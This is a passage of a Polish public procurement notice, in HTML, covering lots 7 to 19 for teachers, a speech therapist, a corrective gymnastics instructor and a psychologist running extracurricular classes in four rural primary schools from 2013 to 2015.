Wykonawca wykonywać będzie powierzone mu obowiązki w czasie określonym łączną liczbą godzin zajęć. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z programem zajęć, który sporządzi i przedstawi Zamawiającemu. Wykonawca zobowiązany będzie do prowadzenia dziennika zajęć oraz dokumentacji wynikającej ze specyfikacji projektu. Wykonawca zobowiązany będzie do prowadzenia i przedstawienia co miesiąc Karty Czasu Pracy. Płatności regulowane będą w okresach miesięcznych po przedstawieniu rachunku. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z harmonogramem ustalonym przez Zamawiającego.
Zajęcia prowadzone będą w 3 grupach (kl. IV, kl. V, kl. VI) 5-8osobowych,  po 1 godzinie co dwa tygodnie dla każdej grupy. 
Kategorie wiekowe uczestników zajęć: uczniowie klasy IV, V oraz VI SP. 
Okres realizacji zadania październik 2013 - czerwiec 2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> NAUCZYCIEL PRZYRODY W SP W SĄDOWIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Niniejsze zamówienie obejmuje prowadzenie zajęć z przyrody w szkole podstawowej w Sądowie, w wymiarze 102 h zegarowych w danej SP w całym okresie trwania projektu.
Minimum 40% godzin zajęć musi być przeprowadzonych z wykorzystaniem aktywizujących metod i technik pracy ICT z uczniem, m.in. gry dydaktyczne, metoda projektów, burza mózgów, pokaz - demonstracje, analiza przypadku, itp.
Zajęcia będą się odbywały od poniedziałku do piątku w trakcie zajęć szkolnych lub bezpośrednio po nich. 
Zajęcia z przyrody w różnych szkołach podstawowych mogą się odbywać w te same dni i godziny.

Zamawiający zastrzega możliwość zmiany ilości godzin prowadzonych zajęć jeżeli zawarcie umów, zależne od przebiegu postępowania, nastąpi w terminie późniejszym niż planowany.
Wykonawca wykonywać będzie powierzone mu obowiązki w czasie określonym łączną liczbą godzin zajęć. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z programem zajęć, który sporządzi i przedstawi Zamawiającemu. Wykonawca zobowiązany będzie do prowadzenia dziennika zajęć oraz dokumentacji wynikającej ze specyfikacji projektu. Wykonawca zobowiązany będzie do prowadzenia i przedstawienia co miesiąc Karty Czasu Pracy. Płatności regulowane będą w okresach miesięcznych po przedstawieniu rachunku. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z harmonogramem ustalonym przez Zamawiającego.
Zajęcia prowadzone będą w 3 grupach (kl. IV, kl. V, kl. VI) 5-8osobowych,  po 1 godzinie co dwa tygodnie dla każdej grupy. 
Kategorie wiekowe uczestników zajęć: uczniowie klasy IV, V oraz VI SP. 
Okres realizacji zadania październik 2013 - czerwiec 2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> NAUCZYCIEL PRZYRODY W SP W RZEPLINIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Niniejsze zamówienie obejmuje prowadzenie zajęć z przyrody w szkole podstawowej w  Rzeplinie, w wymiarze 102 h zegarowych w danej SP w całym okresie trwania projektu.
Minimum 40% godzin zajęć musi być przeprowadzonych z wykorzystaniem aktywizujących metod i technik pracy ICT z uczniem, m.in. gry dydaktyczne, metoda projektów, burza mózgów, pokaz - demonstracje, analiza przypadku, itp.
Zajęcia będą się odbywały od poniedziałku do piątku w trakcie zajęć szkolnych lub bezpośrednio po nich. 
Zajęcia z przyrody w różnych szkołach podstawowych mogą się odbywać w te same dni i godziny.

Zamawiający zastrzega możliwość zmiany ilości godzin prowadzonych zajęć jeżeli zawarcie umów, zależne od przebiegu postępowania, nastąpi w terminie późniejszym niż planowany.
Wykonawca wykonywać będzie powierzone mu obowiązki w czasie określonym łączną liczbą godzin zajęć. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z programem zajęć, który sporządzi i przedstawi Zamawiającemu. Wykonawca zobowiązany będzie do prowadzenia dziennika zajęć oraz dokumentacji wynikającej ze specyfikacji projektu. Wykonawca zobowiązany będzie do prowadzenia i przedstawienia co miesiąc Karty Czasu Pracy. Płatności regulowane będą w okresach miesięcznych po przedstawieniu rachunku. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z harmonogramem ustalonym przez Zamawiającego.
Zajęcia prowadzone będą w 3 grupach (kl. IV, kl. V, kl. VI) 5-8osobowych,  po 1 godzinie co dwa tygodnie dla każdej grupy. 
Kategorie wiekowe uczestników zajęć: uczniowie klasy IV, V oraz VI SP. 
Okres realizacji zadania październik 2013 - czerwiec 2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> NAUCZYCIEL ZAJĘĆ USPRAWNIAJĄCYCH CZYTANIE, PISANIE ORAZ ROZUMOWANIE W SP W DOBROPOLU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Niniejsze zamówienie obejmuje prowadzenie zajęć usprawniających czytanie, pisanie oraz rozumowanie w szkole podstawowej w Dobropolu, w wymiarze 204 h zegarowych w całym okresie trwania projektu. Minimum 40% godzin zajęć musi być przeprowadzonych z wykorzystaniem aktywizujących metod i technik pracy ICT z uczniem, m.in. drama, metoda projektów, gry dydaktyczne, prezentacje, itp.
Zajęcia będą się odbywały od poniedziałku do piątku w trakcie zajęć szkolnych lub bezpośrednio po nich. 
Zajęcia usprawniające czytanie, pisanie oraz rozumowanie w różnych szkołach podstawowych mogą się odbywać w te same dni i godziny.

Zamawiający zastrzega możliwość zmiany ilości godzin prowadzonych zajęć jeżeli zawarcie umów, zależne od przebiegu postępowania, nastąpi w terminie późniejszym niż planowany.
Wykonawca wykonywać będzie powierzone mu obowiązki w czasie określonym łączną liczbą godzin zajęć. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z programem zajęć, który sporządzi i przedstawi Zamawiającemu. Wykonawca zobowiązany będzie do prowadzenia dziennika zajęć oraz dokumentacji wynikającej ze specyfikacji projektu. Wykonawca zobowiązany będzie do prowadzenia i przedstawienia co miesiąc Karty Czasu Pracy. Płatności regulowane będą w okresach miesięcznych po przedstawieniu rachunku. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z harmonogramem ustalonym przez Zamawiającego.
Zajęcia prowadzone będą w 3 grupach (kl. IV, kl. V, kl. VI) 5-8osobowych,  raz w tygodniu po 1 godzinie dla każdej grupy. 
Kategorie wiekowe uczestników zajęć: uczniowie klasy IV, V oraz VI SP. 
Okres realizacji zadania październik 2013 - czerwiec 2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> NAUCZYCIEL ZAJĘĆ USPRAWNIAJĄCYCH CZYTANIE, PISANIE ORAZ ROZUMOWANIE W SP W DOLICACH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Niniejsze zamówienie obejmuje prowadzenie zajęć usprawniających czytanie, pisanie oraz rozumowanie w szkole podstawowej w Dolicach, w wymiarze 204 h zegarowych w całym okresie trwania projektu. Minimum 40% godzin zajęć musi być przeprowadzonych z wykorzystaniem aktywizujących metod i technik pracy ICT z uczniem, m.in. drama, metoda projektów, gry dydaktyczne, prezentacje, itp.
Zajęcia będą się odbywały od poniedziałku do piątku w trakcie zajęć szkolnych lub bezpośrednio po nich. 
Zajęcia usprawniające czytanie, pisanie oraz rozumowanie w różnych szkołach podstawowych mogą się odbywać w te same dni i godziny.

Zamawiający zastrzega możliwość zmiany ilości godzin prowadzonych zajęć jeżeli zawarcie umów, zależne od przebiegu postępowania, nastąpi w terminie późniejszym niż planowany.
Wykonawca wykonywać będzie powierzone mu obowiązki w czasie określonym łączną liczbą godzin zajęć. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z programem zajęć, który sporządzi i przedstawi Zamawiającemu. Wykonawca zobowiązany będzie do prowadzenia dziennika zajęć oraz dokumentacji wynikającej ze specyfikacji projektu. Wykonawca zobowiązany będzie do prowadzenia i przedstawienia co miesiąc Karty Czasu Pracy. Płatności regulowane będą w okresach miesięcznych po przedstawieniu rachunku. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z harmonogramem ustalonym przez Zamawiającego.
Zajęcia prowadzone będą w 3 grupach (kl. IV, kl. V, kl. VI) 5-8osobowych,  raz w tygodniu po 1 godzinie dla każdej grupy. 
Kategorie wiekowe uczestników zajęć: uczniowie klasy IV, V oraz VI SP. 
Okres realizacji zadania październik 2013 - czerwiec 2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> NAUCZYCIEL ZAJĘĆ USPRAWNIAJĄCYCH CZYTANIE, PISANIE ORAZ ROZUMOWANIE W SP W SĄDOWIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Niniejsze zamówienie obejmuje prowadzenie zajęć usprawniających czytanie, pisanie oraz rozumowanie w szkole podstawowej w Sądowie, w wymiarze 204 h zegarowych w całym okresie trwania projektu. Minimum 40% godzin zajęć musi być przeprowadzonych z wykorzystaniem aktywizujących metod i technik pracy ICT z uczniem, m.in. drama, metoda projektów, gry dydaktyczne, prezentacje, itp.
Zajęcia będą się odbywały od poniedziałku do piątku w trakcie zajęć szkolnych lub bezpośrednio po nich. 
Zajęcia usprawniające czytanie, pisanie oraz rozumowanie w różnych szkołach podstawowych mogą się odbywać w te same dni i godziny.

Zamawiający zastrzega możliwość zmiany ilości godzin prowadzonych zajęć jeżeli zawarcie umów, zależne od przebiegu postępowania, nastąpi w terminie późniejszym niż planowany.
Wykonawca wykonywać będzie powierzone mu obowiązki w czasie określonym łączną liczbą godzin zajęć. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z programem zajęć, który sporządzi i przedstawi Zamawiającemu. Wykonawca zobowiązany będzie do prowadzenia dziennika zajęć oraz dokumentacji wynikającej ze specyfikacji projektu. Wykonawca zobowiązany będzie do prowadzenia i przedstawienia co miesiąc Karty Czasu Pracy. Płatności regulowane będą w okresach miesięcznych po przedstawieniu rachunku. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z harmonogramem ustalonym przez Zamawiającego.
Zajęcia prowadzone będą w 3 grupach (kl. IV, kl. V, kl. VI) 5-8osobowych,  raz w tygodniu po 1 godzinie dla każdej grupy. 
Kategorie wiekowe uczestników zajęć: uczniowie klasy IV, V oraz VI SP. 
Okres realizacji zadania październik 2013 - czerwiec 2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> NAUCZYCIEL ZAJĘĆ USPRAWNIAJĄCYCH CZYTANIE, PISANIE ORAZ ROZUMOWANIE W SP W RZEPLINIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Niniejsze zamówienie obejmuje prowadzenie zajęć usprawniających czytanie, pisanie oraz rozumowanie w szkole podstawowej w  Rzeplinie, w wymiarze 204 h zegarowych w całym okresie trwania projektu. Minimum 40% godzin zajęć musi być przeprowadzonych z wykorzystaniem aktywizujących metod i technik pracy ICT z uczniem, m.in. drama, metoda projektów, gry dydaktyczne, prezentacje, itp.
Zajęcia będą się odbywały od poniedziałku do piątku w trakcie zajęć szkolnych lub bezpośrednio po nich. 
Zajęcia usprawniające czytanie, pisanie oraz rozumowanie w różnych szkołach podstawowych mogą się odbywać w te same dni i godziny.

Zamawiający zastrzega możliwość zmiany ilości godzin prowadzonych zajęć jeżeli zawarcie umów, zależne od przebiegu postępowania, nastąpi w terminie późniejszym niż planowany.
Wykonawca wykonywać będzie powierzone mu obowiązki w czasie określonym łączną liczbą godzin zajęć. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z programem zajęć, który sporządzi i przedstawi Zamawiającemu. Wykonawca zobowiązany będzie do prowadzenia dziennika zajęć oraz dokumentacji wynikającej ze specyfikacji projektu. Wykonawca zobowiązany będzie do prowadzenia i przedstawienia co miesiąc Karty Czasu Pracy. Płatności regulowane będą w okresach miesięcznych po przedstawieniu rachunku. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z harmonogramem ustalonym przez Zamawiającego.
Zajęcia prowadzone będą w 3 grupach (kl. IV, kl. V, kl. VI) 5-8osobowych,  raz w tygodniu po 1 godzinie dla każdej grupy. 
Kategorie wiekowe uczestników zajęć: uczniowie klasy IV, V oraz VI SP. 
Okres realizacji zadania październik 2013 - czerwiec 2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> NAUCZYCIEL ZAJĘĆ Z WYKORZYSTANIA WIEDZY W PRAKTYCE I UMIEJĘTNOŚCI KORZYSTANIA Z INFORMACJI W SP W DOBROPOLU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Niniejsze zamówienie obejmuje prowadzenie zajęć z wykorzystania wiedzy w praktyce i umiejętności korzystania z informacji w szkole podstawowej w Dobropolu, w wymiarze 204 h zegarowych w całym okresie trwania projektu. Minimum 40% godzin zajęć musi być przeprowadzonych z wykorzystaniem aktywizujących metod i technik pracy ICT z uczniem, np. gry dydaktyczne, metoda projektów, burza mózgów, pokaz - demonstracje, analiza przypadku, itp.
Zajęcia będą się odbywały od poniedziałku do piątku w trakcie zajęć szkolnych lub bezpośrednio po nich. 
Zajęcia z wykorzystania wiedzy w praktyce i umiejętności korzystania z informacji w różnych szkołach podstawowych mogą się odbywać w te same dni i godziny.

Zamawiający zastrzega możliwość zmiany ilości godzin prowadzonych zajęć jeżeli zawarcie umów, zależne od przebiegu postępowania, nastąpi w terminie późniejszym niż planowany.
Wykonawca wykonywać będzie powierzone mu obowiązki w czasie określonym łączną liczbą godzin zajęć. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z programem zajęć, który sporządzi i przedstawi Zamawiającemu. Wykonawca zobowiązany będzie do prowadzenia dziennika zajęć oraz dokumentacji wynikającej ze specyfikacji projektu. Wykonawca zobowiązany będzie do prowadzenia i przedstawienia co miesiąc Karty Czasu Pracy. Płatności regulowane będą w okresach miesięcznych po przedstawieniu rachunku. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z harmonogramem ustalonym przez Zamawiającego.
Zajęcia prowadzone będą w 3 grupach (kl. IV, kl. V, kl. VI) 5-8osobowych,  raz w tygodniu po 1 godzinie dla każdej grupy. 
Kategorie wiekowe uczestników zajęć: uczniowie klasy IV, V oraz VI SP. 
Okres realizacji zadania październik 2013 - czerwiec 2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> NAUCZYCIEL ZAJĘĆ Z WYKORZYSTANIA WIEDZY W PRAKTYCE I UMIEJĘTNOŚCI KORZYSTANIA Z INFORMACJI W SP W DOLICACH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Niniejsze zamówienie obejmuje prowadzenie zajęć z wykorzystania wiedzy w praktyce i umiejętności korzystania z informacji w szkole podstawowej w Dolicach, w wymiarze 204 h zegarowych w całym okresie trwania projektu. Minimum 40% godzin zajęć musi być przeprowadzonych z wykorzystaniem aktywizujących metod i technik pracy ICT z uczniem, np. gry dydaktyczne, metoda projektów, burza mózgów, pokaz - demonstracje, analiza przypadku, itp.
Zajęcia będą się odbywały od poniedziałku do piątku w trakcie zajęć szkolnych lub bezpośrednio po nich. 
Zajęcia z wykorzystania wiedzy w praktyce i umiejętności korzystania z informacji w różnych szkołach podstawowych mogą się odbywać w te same dni i godziny.

Zamawiający zastrzega możliwość zmiany ilości godzin prowadzonych zajęć jeżeli zawarcie umów, zależne od przebiegu postępowania, nastąpi w terminie późniejszym niż planowany.
Wykonawca wykonywać będzie powierzone mu obowiązki w czasie określonym łączną liczbą godzin zajęć. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z programem zajęć, który sporządzi i przedstawi Zamawiającemu. Wykonawca zobowiązany będzie do prowadzenia dziennika zajęć oraz dokumentacji wynikającej ze specyfikacji projektu. Wykonawca zobowiązany będzie do prowadzenia i przedstawienia co miesiąc Karty Czasu Pracy. Płatności regulowane będą w okresach miesięcznych po przedstawieniu rachunku. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z harmonogramem ustalonym przez Zamawiającego.
Zajęcia prowadzone będą w 3 grupach (kl. IV, kl. V, kl. VI) 5-8osobowych,  raz w tygodniu po 1 godzinie dla każdej grupy. 
Kategorie wiekowe uczestników zajęć: uczniowie klasy IV, V oraz VI SP. 
Okres realizacji zadania październik 2013 - czerwiec 2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> NAUCZYCIEL ZAJĘĆ Z WYKORZYSTANIA WIEDZY W PRAKTYCE I UMIEJĘTNOŚCI KORZYSTANIA Z INFORMACJI W SP W SĄDOWIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Niniejsze zamówienie obejmuje prowadzenie zajęć z wykorzystania wiedzy w praktyce i umiejętności korzystania z informacji w szkole podstawowej w Sądowie, w wymiarze 204 h zegarowych w całym okresie trwania projektu. Minimum 40% godzin zajęć musi być przeprowadzonych z wykorzystaniem aktywizujących metod i technik pracy ICT z uczniem, np. gry dydaktyczne, metoda projektów, burza mózgów, pokaz - demonstracje, analiza przypadku, itp.
Zajęcia będą się odbywały od poniedziałku do piątku w trakcie zajęć szkolnych lub bezpośrednio po nich. 
Zajęcia z wykorzystania wiedzy w praktyce i umiejętności korzystania z informacji w różnych szkołach podstawowych mogą się odbywać w te same dni i godziny.

Zamawiający zastrzega możliwość zmiany ilości godzin prowadzonych zajęć jeżeli zawarcie umów, zależne od przebiegu postępowania, nastąpi w terminie późniejszym niż planowany.
Wykonawca wykonywać będzie powierzone mu obowiązki w czasie określonym łączną liczbą godzin zajęć. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z programem zajęć, który sporządzi i przedstawi Zamawiającemu. Wykonawca zobowiązany będzie do prowadzenia dziennika zajęć oraz dokumentacji wynikającej ze specyfikacji projektu. Wykonawca zobowiązany będzie do prowadzenia i przedstawienia co miesiąc Karty Czasu Pracy. Płatności regulowane będą w okresach miesięcznych po przedstawieniu rachunku. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z harmonogramem ustalonym przez Zamawiającego.
Zajęcia prowadzone będą w 3 grupach (kl. IV, kl. V, kl. VI) 5-8osobowych,  raz w tygodniu po 1 godzinie dla każdej grupy. 
Kategorie wiekowe uczestników zajęć: uczniowie klasy IV, V oraz VI SP. 
Okres realizacji zadania październik 2013 - czerwiec 2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> NAUCZYCIEL ZAJĘĆ Z WYKORZYSTANIA WIEDZY W PRAKTYCE I UMIEJĘTNOŚCI KORZYSTANIA Z INFORMACJI W SP W RZEPLINIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Niniejsze zamówienie obejmuje prowadzenie zajęć z wykorzystania wiedzy w praktyce i umiejętności korzystania z informacji w szkole podstawowej w  Rzeplinie, w wymiarze 204 h zegarowych w całym okresie trwania projektu. Minimum 40% godzin zajęć musi być przeprowadzonych z wykorzystaniem aktywizujących metod i technik pracy ICT z uczniem, np. gry dydaktyczne, metoda projektów, burza mózgów, pokaz - demonstracje, analiza przypadku, itp.
Zajęcia będą się odbywały od poniedziałku do piątku w trakcie zajęć szkolnych lub bezpośrednio po nich. 
Zajęcia z wykorzystania wiedzy w praktyce i umiejętności korzystania z informacji w różnych szkołach podstawowych mogą się odbywać w te same dni i godziny.

Zamawiający zastrzega możliwość zmiany ilości godzin prowadzonych zajęć jeżeli zawarcie umów, zależne od przebiegu postępowania, nastąpi w terminie późniejszym niż planowany.
Wykonawca wykonywać będzie powierzone mu obowiązki w czasie określonym łączną liczbą godzin zajęć. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z programem zajęć, który sporządzi i przedstawi Zamawiającemu. Wykonawca zobowiązany będzie do prowadzenia dziennika zajęć oraz dokumentacji wynikającej ze specyfikacji projektu. Wykonawca zobowiązany będzie do prowadzenia i przedstawienia co miesiąc Karty Czasu Pracy. Płatności regulowane będą w okresach miesięcznych po przedstawieniu rachunku. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z harmonogramem ustalonym przez Zamawiającego.
Zajęcia prowadzone będą w 3 grupach (kl. IV, kl. V, kl. VI) 5-8osobowych,  raz w tygodniu po 1 godzinie dla każdej grupy. 
Kategorie wiekowe uczestników zajęć: uczniowie klasy IV, V oraz VI SP. 
Okres realizacji zadania październik 2013 - czerwiec 2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> LOGOPEDA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Niniejsze zamówienie obejmuje prowadzenie zajęć logopedycznych (m.in. badania diagnostyczne  w zakresie rozwoju mowy, organizowanie i prowadzenie różnych form terapii dla dzieci z wadami wymowy, prowadzenie doradztwa dla rodziców w zakresie rozwoju mowy dziecka) w SP w Dolicach, w Rzeplinie, w Sądowie, w Dobropolu w wymiarze 272 h zegarowych w całym okresie trwania projektu, po 1 godzinie w tygodniu w każdej SP.
Zajęcia będą się odbywały od poniedziałku do piątku w trakcie zajęć szkolnych lub bezpośrednio po nich. 

Zamawiający zastrzega możliwość zmiany ilości godzin prowadzonych zajęć jeżeli zawarcie umów, zależne od przebiegu postępowania, nastąpi w terminie późniejszym niż planowany.
Wykonawca wykonywać będzie powierzone mu obowiązki w czasie określonym łączną liczbą godzin zajęć. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z programem zajęć, który sporządzi i przedstawi Zamawiającemu. Wykonawca zobowiązany będzie do prowadzenia dziennika zajęć, teczki badań dziecka (w której będą wywiady z rodzicami, arkusze i wyniki badań, prace dzieci, itp.) oraz dokumentacji wynikającej ze specyfikacji projektu. Wykonawca zobowiązany będzie do prowadzenia i przedstawienia co miesiąc Karty Czasu Pracy. Płatności regulowane będą w okresach miesięcznych po przedstawieniu rachunku. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z harmonogramem ustalonym przez Zamawiającego. 
Kategorie wiekowe uczestników zajęć: uczniowie klasy IV, V oraz VI SP. 
Zajęcia prowadzone będą indywidualnie i grupowo.
Okres realizacji zadania październik 2013 - czerwiec 2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> NAUCZYCIEL GIMNASTYKI KOREKCYJNEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Niniejsze zamówienie obejmuje prowadzenie zajęć gimnastyki korekcyjnej(a także prowadzenie doradztwa dla rodziców i nauczycieli, opracowanie wskazań domowych oraz ćwiczeń uzupełniających wykonywanych w domu) w SP w Dolicach, w Rzeplinie, w Sądowie, w Dobropolu w wymiarze 136 h zegarowych w całym okresie trwania projektu, po 1 godzinie co dwa tygodnie w każdej SP.
Zajęcia będą się odbywały od poniedziałku do piątku w trakcie zajęć szkolnych lub bezpośrednio po nich. 

Zamawiający zastrzega możliwość zmiany ilości godzin prowadzonych zajęć jeżeli zawarcie umów, zależne od przebiegu postępowania, nastąpi w terminie późniejszym niż planowany.
Wykonawca wykonywać będzie powierzone mu obowiązki w czasie określonym łączną liczbą godzin zajęć. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z programem zajęć, który sporządzi i przedstawi Zamawiającemu. Wykonawca zobowiązany będzie do prowadzenia dziennika zajęć, teczki badań dziecka (w której będą wywiady z rodzicami, arkusze i wyniki badań, prace dzieci, itp.) oraz dokumentacji wynikającej ze specyfikacji projektu. Wykonawca zobowiązany będzie do prowadzenia i przedstawienia co miesiąc Karty Czasu Pracy. Płatności regulowane będą w okresach miesięcznych po przedstawieniu rachunku. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z harmonogramem ustalonym przez Zamawiającego. 
Kategorie wiekowe uczestników zajęć: uczniowie klasy IV, V oraz VI SP. 
Zajęcia prowadzone będą indywidualnie i grupowo.
Okres realizacji zadania październik 2013 - czerwiec 2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> PSYCHOLOG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Niniejsze zamówienie obejmuje prowadzenie zajęć psychologicznych (m.in. badania diagnostyczne dzieci, rozpoznawanie indywidualnych potrzeb dzieci oraz analizowanie przyczyn niepowodzeń, określanie form i sposobów udzielania pomocy dzieciom odpowiednio do rozpoznanych potrzeb, współorganizowanie zajęć dydaktycznych prowadzonych przez nauczycieli dla dzieci niepełnosprawnych, udzielanie różnych form pomocy psychologicznej i pedagogicznej dzieciom, prowadzenie doradztwa psychologicznego dla rodziców i nauczycieli, współpraca z wychowawcami i rodzicami w minimalizowaniu skutków zaburzeń rozwojowych, zapobieganie zaburzeniom zachowania oraz inicjowanie różnych form pomocy wychowawczej, wykonywanie innych czynności wynikających z zapewnienia prawidłowej organizacji pracy) w SP w Dolicach, w Rzeplinie, w Sądowie, w Dobropolu, w wymiarze 136 h zegarowych w całym okresie trwania projektu, po 1 godzinie co dwa tygodnie w każdej SP.
Zajęcia będą się odbywały od poniedziałku do piątku w trakcie zajęć szkolnych lub bezpośrednio po nich. 

Zamawiający zastrzega możliwość zmiany ilości godzin prowadzonych zajęć  jeżeli zawarcie umów, zależne od przebiegu postępowania, nastąpi w terminie późniejszym niż planowany.
